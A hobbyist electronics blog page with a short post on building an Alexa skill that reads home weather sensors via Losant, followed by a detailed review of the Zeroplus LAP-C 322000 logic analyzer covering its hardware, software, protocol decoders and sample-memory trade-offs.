Using this tutorial, I created an Amazon Alexa skill for querying my weather logging nodes. The setup was a bit complex, but the tutorial does a good job of explaining the skill configuration that’s required in the Amazon developer admin interface, and the Losant workflow design. Within an afternoon of fiddling it was all working great. I can ask for the temperature or dewpoint of a specific weather node, using generic language like “temperature” or “how warm is it”. I can also make a general inquiry and have Alexa prompt me for necessary details:

“Alexa, ask the house how hot it is.”
“Which station? You can say kitchen, study, downstairs, or outside.”
“Outside”
“The current outside temperature is 63.1 degrees.”

Most of the interesting configuration work is done in the Amazon admin interface. This is where the various “intents” are defined (specific actions or requests that can be made by the user), and the vocabulary words related to each intent. It’s also where the Alexa skill is given a name, which in my example is “the house”. By beginning a request with “ask the house”, Amazon knows to process the rest of the sentence through my skill template instead of its built-in response templates. Once it determines what I’m asking for, Amazon’s server makes a web request to Losant. The Losant server looks up the desired data and returns it to Amazon, who sends it back to my Echo to be articulated as a spoken reply. Asking for the dewpoint in the kitchen may be pointless, but feels almost like conversing with the Star Trek computer. The future is here!

Read 4 comments and join the conversation 

Zeroplus LAP-C 322000 Logic Analyzer Review

Who needs a logic analyzer? You do! If you enjoy working with electronics, a good logic analyzer is an indispensable tool. It lets you examine exactly what’s happening with your data signals, so you can troubleshoot problems quickly or reverse-engineer unknown protocols. Developing digital electronics without a logic analyzer is like navigating without a map.

In decades past, logic analyzers were bulky and expensive purpose-built machines from companies like Hewlett Packard. There’s still a place for such high-end equipment, but today most engineers can get everything they need from a small USB device that costs just a few hundred dollars. Saleae is one of the better-known names here, but it’s a crowded market with many worthy competitors. Which one is right for you?

 
Hello Zeroplus

Today I’ll take a look at an example of the Zeroplus “Logic Cube” series. Zeroplus is based in Taiwan, and their logic analyzer products have a good reputation among Taiwanese IT companies, but are less well known in the West. Full disclosure: Zeroplus sent me a demo unit for the purpose of this review. What you’ll read below are my own unfiltered opinions of the hardware’s strengths and weaknesses.

The members of this product family are buffered logic analyzers, with a few megabits of high speed on-board memory for storing the captured sample data. This is the more traditional approach to designing a logic analyzer, and it provides some advantages versus the on-the-fly USB streaming approach used by Saleae and other similar low-cost logic analyzers. Buffered LAs aren’t reliant on the PC’s USB bandwidth, so they can capture many channels at high sample rates without fear of saturating the USB link and losing data. The tradeoff is that buffered LAs have finite storage space, so the maximum amount of data that can be captured is limited. Data compression helps, but once the on-board memory is full, signal acquisition stops. In contrast, streaming LAs support “infinite” capture sizes limited only by the PC’s available RAM and disk space, but have limited bandwidth.

The Zeroplus logic analyzers in this Logic Cube series are commonly called “LAP-C” for the common prefix in all of their model numbers, and you’ll find the most pertinent resources on the web by searching for this term. LAP-C models are sold in seven different versions, differing mainly in the number of channels and amount of on-board memory. For this review, I tested the top of the line LAP-C 322000, with a retail price of $1699 in the United States. Here are the specs:

Logic Analyzer: Zeroplus LAP-C 322000
Number of Channels: 32
Sample Memory: 64 Mbits (2 Mbits per channel)
Max Sample Rate: 200 MHz
Vinput of Testing Channels: -30V to +30V DC
Retail Price: USD $1699

In comparison, the mid-range members of the LAP-C family pare back the number of channels and memory size in exchange for lower prices. For example, LAP-C 16064 is 16 channels / 1 Mbit / 100 MHz for $249, and LAP-C 16128 is 16 channels / 4 Mbits / 200 MHz for $399.

 
Unboxing and Hardware

While the front of the box has English text, the technical bullet points on the back are primarily in Chinese. This probably doesn’t matter much, since very few people will ever be browsing store shelves when shopping for a logic analyzer, but it shows that Zeroplus’ marketing team has additional translation work to do if they hope to attract more Western customers.

The 34-page instruction manual inside the box is also Chinese, but a well-written English-language manual can be downloaded here.

The logic analyzer unit and its accessories all fit inside a hardshell zippered case that’s included. While it’s a small thing, this is a very nice touch, and it makes it easy to pack up your project when you’re finished debugging hardware. The pulse width trigger module included with the LAP-C 322000 model is the only accessory that doesn’t go in the hardshell case.

The LAP-C 322000 package includes:

  • logic analyzer main unit
  • USB cable
  • 32 flying lead wires
  • 36 IC test hooks
  • printed manual (Chinese)
  • installation software CD
  • hardshell case
  • pulse width trigger module
  • hookup wires for trigger module

The pulse width trigger module is made from brushed aluminum. When connected to the main unit, this module upgrades the logic analyzer with a new feature: the ability to trigger on a high or low pulse whose duration is outside a user-selected range. This may be useful when working on PWM applications like dimmable lighting.

The main logic analyzer unit is made from an attractive gloss white plastic. The external interface is minimal: a button to start immediate captures, and status lights for Run, Read, and Trigger. The external connector is two rows of standard 0.1 inch male headers. In addition to the 32 data channel connections and ground pins, there’s also an external clock input, and a few special I/O pins for connecting the pulse width trigger module or a second LAP-C unit.

The LAP-C does not offer any analog measurement capability. While serious analog work demands an oscilloscope, some newer logic analyzers are starting to add low-bandwidth analog capability too. This can be useful for verifying that signal voltage levels are in a valid range, or that power supplies are behaving as expected. Analog measurement is a nice extra feature, but its absence here isn’t a deal-breaker.

 
Software

The LAP-C software is Windows-only. That’s not a big limitation, since any halfway-serious engineer will have access to a Windows machine even if it’s not their main system, but Macintosh and Linux software versions would have been nice. Windows 7, 8, and 10 compatibility is advertised. I used software V3.13.05 with Windows 7. You can download the software and try it out in demo mode, even if you don’t have the LAP-C hardware. The English-language software translations are generally well done and easy to understand.

The graphical interface appears geared towards advanced users, with a very large number of tools, measurements, and options visible directly on the main screen. This is great for power users, but may be overwhelming for newbies, or to anyone accustomed to the minimal interface of Saleae’s software. I found it a bit daunting at first, but after 30 minutes of experimenting and checking the manual, I had mastered the basics.

Some aspects of the UI would benefit from more polish. When viewing large data ranges, panning and zooming the waveform can be glitchy, with a laggy response to mouse input and different portions of the waveform scrolling a fraction of a second after others. Compared to the smooth pan and zoom of competing logic analyzer software, or to tools like Google Maps, that’s a little disappointing. Other minor graphical glitches and goofs sometimes appear, like waveforms that aren’t a uniform height or scale values that are the wrong units. The intervals of the ruler are also oddly chosen, with tickmarks at 0.409374912 seconds followed by 1.91042 seconds and then 3.411465 seconds, instead of divisions at even intervals using powers of 10. None of this prevents you from analyzing captured sample data, but it can be confusing and distracting.

A data capture can be started immediately by pressing a button in the software, or by pressing the physical button on the logic analyzer unit. Captures can also be triggered by a level or edge condition on a single channel, or by more complex functions like a specific value on a parallel bus, or a protocol-level event like an I2C NACK.

There are an impressive number of powerful features embedded in the LAP-C software. Repetitive run triggers the logic analyzer over and over, so you can look for one instance that’s different from the others. Noise filter ignores pulses with a duration below the threshold you specify. Data can be captured with an asynchronous internal clock, or synchronously using an external clock connection. Captured data can be searched in several different ways to find a region of interest. Waveforms and data can be imported and exported for additional examination with other tools. There are many more advanced analysis features that I didn’t have time to explore deeply. Some of these may only be valuable in specific circumstances, like the memory analyzer for examining address/data information, but they’re great when they provide the special capabilities you need.

One small but curious shortcoming: in the software’s list of choices for the sampling rate, it skips directly from 1 MHz to 10 MHz with no intermediate options. Most of my electronics projects operate a speeds faster than 1 MHz but slower than 10 MHz, so the missing sample rate options are a bigger issue for me than they might be for others.

Capturing and viewing sets of raw waveforms is great, and is the core of logic analyzer usage. But to really get the most out of the tool, you’ll want to use the software’s protocol analyzers to provide a high-level representation of the data. A protocol analyzer is a software module that converts raw waveforms into decoded data packets. For example, if the software offers an I2C protocol analyzer, then you can view the captured sample data as a series of device addresses, data bytes, and ACKs, instead of counting raw transitions of the SCK and SCL signals while you thumb through an I2C reference guide. The LAP-C software offers over 100 protocol analyzers, including I2C, SPI, serial (RS-232C/422/485), JTAG, PS/2, USB, 1-WIRE, CAN, IRDA, 3-WIRE, and many more. Some of these used to be extra cost options, but since 2016 all the protocol analyzers are available free. Here’s a typical protocol analyzer example from Zeroplus:

 
How Much Sample Memory Do You Need?

When purchasing a buffered logic analyzer, you need to predict in advance how much sample memory you’re likely to need. Underestimating is bad: if there’s not enough sample memory, you won’t be able to capture as many channels for as long a duration as needed for your debugging work. But overestimating is bad too: it means you’ll pay hundreds of dollars extra for additional sample memory you don’t need. So how can you decide how much memory is enough?

This is a difficult question to answer, because it depends heavily on the type of electronics work that you do. You might work primarily with low speed serial signals, or you might need to analyze a wide parallel bus running at high speeds. Your data might be highly compressible with the LAP-C’s compression algorithm, or it might not. This leads to a frustrating “it depends” answer that satisfies no one.

For my own hobby electronics work over the past few years, I typically need to analyze systems with 5 to 10 signals running at speeds between 1 MHz and 10 MHz. My normal work pattern with a streaming logic analyzer is to manually start the capture, and record a few seconds of data, then examine it afterwards to zoom in on the interesting parts. Using a buffered logic analyzer, without the benefit of compression, this would require a worst case of 10 signals times 10 MHz times 10 seconds, or 1000 Mbits total. My simple experiments with LAP-C compression found that it provided about a 10x improvement for my data, so that reduces the memory requirement to 100 Mbits – close enough to the LAP-C 322000’s 64 Mbits. So with the top of the line LAP-C model, I could probably support my existing work pattern, but anything with less memory would be insufficient.

To really get the benefit of the LAP-C hardware, I would need to stop using 10 second long captures, and instead set up triggers to capture only the few hundred milliseconds or microseconds I’m really interested in. That would require some extra time for setup, but would greatly reduce the amount of memory needed.

 
Other Thoughts

Zeroplus’ web site lists two official US distributors, and one appears to only stock the entry level LAP-C 16032, leaving a single source for most LAP-C models in the US. With a bit of Google searching, you can also find third-party LAP-C sellers from Asia who will ship directly to the US. Direct sales from the Zeroplus web site would be a welcome addition, but are not currently an option.

Is the Zeroplus LAP-C series right for you? It depends on what you plan to do with it. For the casual electronics hobbyists who are typical readers of this blog, the $1699 price tag of the LAP-C 322000 may be more than they’re willing to spend, but they probably don’t need all the features of the LAP-C 322000 either. Zeroplus offers three LAP-C models with slightly lower specs all priced below $400, which are probably a better fit for part-time garage hackers. I expect that most hobbyists will be fine stepping down from 32 to 16 channels, although stepping down from 64 Mbits of memory to 4 Mbits or 1 Mbit may be a concern.

With 4 Mbits and 16 channels, at a 10 MHz sample rate and using compression, you’ll get a capture window of a couple hundred milliseconds. That’s small enough so that manual triggering is unrealistic. Instead, you’ll need to plan ahead of time to decide what your goal is with this capture, and how you can construct a trigger to capture exactly the region you need to examine. For power users working with high speed systems and large numbers of channels, this will already be familiar. They’re more likely to know specifically what they’re looking for, and to see complex trigger setup as a normal and expected part of debugging. They’re also more likely to benefit from some of the LAP-C’s advanced features and hardware options like external clock input, pulse width triggering, and detailed software analysis. The breadth and depth of the LAP-C software’s various tools and analyzers is impressive, and will surely be a boon for hardcore electronics engineers. Beginners and others with more basic needs may be better off with an 8-channel streaming logic analyzer with a simple and friendly software interface.

What about the general merits of buffered vs streaming logic analyzer designs? For situations where there’s enough USB bandwidth to stream the sample data on the fly, I believe that approach provides a better user experience. There’s no need to worry about trading off sample rate for sample depth, or worrying whether the capture window will be large enough to contain all the events of interest. But for more demanding situations with large numbers of channels and high sample rates, streaming just doesn’t work. 32 channels at 200 Mhz sampling rate is 6.4 Gbits/sec, which is more than USB 3.0’s total maximum theoretical bandwidth and far more than its real-world bandwidth. So depending on the application, both streaming and buffered designs have their place.

My ideal logic analyzer would be one that operates in streaming mode where sufficient USB bandwidth is available, and falls back to buffered operation when streaming won’t work. That would probably be needlessly complex and expensive, but I can dream!

Read 4 comments and join the conversation 

Older Posts »